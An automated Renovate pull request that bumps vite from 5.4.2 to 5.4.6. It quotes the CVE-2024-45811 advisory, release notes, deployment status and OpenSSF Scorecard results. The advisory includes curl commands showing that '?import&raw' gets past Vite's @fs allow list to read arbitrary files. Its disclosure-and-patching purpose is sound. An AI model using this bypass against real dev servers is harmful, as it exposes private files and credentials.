chore(deps): update dependency vite to v5.4.6 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vite (source)	5.4.2 -> 5.4.6

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

---

Release Notes

vitejs/vite (vite)

v5.4.6

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.5

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.4

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.3

Compare Source

• fix: allow getting URL of JS files in publicDir (#​17915) (943ece1), closes #​17915
• fix: cjs warning respect the logLevel flag (#​17993) (dc3c14f), closes #​17993
• fix: improve CJS warning trace information (#​17926) (5c5f82c), closes #​17926
• fix: only remove entry assets handled by Vite core (#​17916) (ebfaa7e), closes #​17916
• fix: waitForRequestIdle locked (#​17982) (ad13760), closes #​17982
• fix(css): fix directory index import in sass modern api (#​17960) (9b001ba), closes #​17960
• fix(css): fix sass file:// reference (#​17909) (561b940), closes #​17909
• fix(css): fix sass modern source map (#​17938) (d428e7e), closes #​17938
• fix(deps): bump tsconfck (#​17990) (8c661b2), closes #​17990
• fix(html): rewrite assets url in (#​17988) (413c86a), closes #​17988
• fix(preload): add crossorigin attribute in CSS link tags (#​17930) (15871c7), closes #​17930
• chore: reduce diffs with v6 branch (#​17942) (bf9065a), closes #​17942
• chore(deps): update all non-major dependencies (#​17945) (cfb621e), closes #​17945
• chore(deps): update all non-major dependencies (#​17991) (0ca53cf), closes #​17991

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Madrid, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[vercel]

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name	Status	Preview	Comments	Updated (UTC)
unleash-monorepo-frontend	✅ Ready (Inspect)	Visit Preview	💬 Add feedback	Sep 17, 2024 7:27pm

1 Skipped Deployment

Name	Status	Preview	Comments	Updated (UTC)
unleash-docs	⬜️ Ignored (Inspect)	Visit Preview		Sep 17, 2024 7:27pm

[github-actions]

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

OpenSSF Scorecard

Package	Version	Score	Details
npm/vite	5.4.6	🟢 5.5	Details Check Score Reason Code-Review 🟢 9 Found 25/27 approved changesets -- score normalized to 9 Maintained 🟢 10 30 commit(s) and 13 issue activity found in the last 90 days -- score normalized to 10 CII-Best-Practices ⚠️ 0 no effort to earn an OpenSSF best practices badge detected License 🟢 10 license file detected Signed-Releases ⚠️ -1 no releases found Branch-Protection ⚠️ -1 internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration Dangerous-Workflow 🟢 10 no dangerous workflow patterns detected Token-Permissions ⚠️ 0 detected GitHub workflow tokens with excessive permissions Packaging ⚠️ -1 packaging workflow not detected Binary-Artifacts 🟢 7 binaries present in source code Pinned-Dependencies ⚠️ 0 dependency not pinned by hash detected -- score normalized to 0 SAST ⚠️ 0 SAST tool is not run on all commits -- score normalized to 0 Fuzzing ⚠️ 0 project is not fuzzed Security-Policy 🟢 10 security policy file detected Vulnerabilities 🟢 4 6 existing vulnerabilities detected
npm/picocolors	1.1.0	🟢 4.3	Details Check Score Reason Code-Review 🟢 5 Found 9/18 approved changesets -- score normalized to 5 Maintained 🟢 4 3 commit(s) and 2 issue activity found in the last 90 days -- score normalized to 4 CII-Best-Practices ⚠️ 0 no effort to earn an OpenSSF best practices badge detected License 🟢 10 license file detected Signed-Releases ⚠️ -1 no releases found Dangerous-Workflow 🟢 10 no dangerous workflow patterns detected Packaging ⚠️ -1 packaging workflow not detected Binary-Artifacts 🟢 10 no binaries found in the repo Pinned-Dependencies ⚠️ 0 dependency not pinned by hash detected -- score normalized to 0 Token-Permissions ⚠️ 0 detected GitHub workflow tokens with excessive permissions Security-Policy ⚠️ 0 security policy file not detected Fuzzing ⚠️ 0 project is not fuzzed Vulnerabilities 🟢 10 0 existing vulnerabilities detected Branch-Protection ⚠️ 0 branch protection not enabled on development/release branches SAST ⚠️ 0 SAST tool is not run on all commits -- score normalized to 0
npm/postcss	8.4.47	🟢 4.6	Details Check Score Reason Code-Review ⚠️ 2 Found 7/24 approved changesets -- score normalized to 2 Maintained 🟢 10 30 commit(s) and 10 issue activity found in the last 90 days -- score normalized to 10 CII-Best-Practices ⚠️ 0 no effort to earn an OpenSSF best practices badge detected License 🟢 10 license file detected Dangerous-Workflow 🟢 10 no dangerous workflow patterns detected Packaging ⚠️ -1 packaging workflow not detected Binary-Artifacts 🟢 10 no binaries found in the repo Token-Permissions ⚠️ 0 detected GitHub workflow tokens with excessive permissions Branch-Protection ⚠️ 0 branch protection not enabled on development/release branches Pinned-Dependencies ⚠️ 0 dependency not pinned by hash detected -- score normalized to 0 Signed-Releases ⚠️ -1 no releases found Security-Policy ⚠️ 0 security policy file not detected Fuzzing ⚠️ 0 project is not fuzzed SAST ⚠️ 0 SAST tool is not run on all commits -- score normalized to 0 Vulnerabilities 🟢 10 0 existing vulnerabilities detected
npm/source-map-js	1.2.1	🟢 3	Details Check Score Reason Code-Review 🟢 3 Found 11/30 approved changesets -- score normalized to 3 Maintained 🟢 4 5 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 4 CII-Best-Practices ⚠️ 0 no effort to earn an OpenSSF best practices badge detected License 🟢 9 license file detected Signed-Releases ⚠️ -1 no releases found Packaging ⚠️ -1 packaging workflow not detected Token-Permissions ⚠️ -1 No tokens found Dangerous-Workflow ⚠️ -1 no workflows found Branch-Protection 🟢 3 branch protection is not maximal on development and all release branches Binary-Artifacts 🟢 10 no binaries found in the repo Security-Policy ⚠️ 0 security policy file not detected Pinned-Dependencies ⚠️ -1 no dependencies found SAST ⚠️ 0 SAST tool is not run on all commits -- score normalized to 0 Fuzzing ⚠️ 0 project is not fuzzed Vulnerabilities ⚠️ 0 10 existing vulnerabilities detected
npm/vite	5.4.6	🟢 5.5	Details Check Score Reason Code-Review 🟢 9 Found 25/27 approved changesets -- score normalized to 9 Maintained 🟢 10 30 commit(s) and 13 issue activity found in the last 90 days -- score normalized to 10 CII-Best-Practices ⚠️ 0 no effort to earn an OpenSSF best practices badge detected License 🟢 10 license file detected Signed-Releases ⚠️ -1 no releases found Branch-Protection ⚠️ -1 internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration Dangerous-Workflow 🟢 10 no dangerous workflow patterns detected Token-Permissions ⚠️ 0 detected GitHub workflow tokens with excessive permissions Packaging ⚠️ -1 packaging workflow not detected Binary-Artifacts 🟢 7 binaries present in source code Pinned-Dependencies ⚠️ 0 dependency not pinned by hash detected -- score normalized to 0 SAST ⚠️ 0 SAST tool is not run on all commits -- score normalized to 0 Fuzzing ⚠️ 0 project is not fuzzed Security-Policy 🟢 10 security policy file detected Vulnerabilities 🟢 4 6 existing vulnerabilities detected

Scanned Manifest Files

frontend/package.json

• [email protected]
• [email protected]

frontend/yarn.lock

• [email protected]
• [email protected]
• [email protected]
• [email protected]
• [email protected]
• [email protected]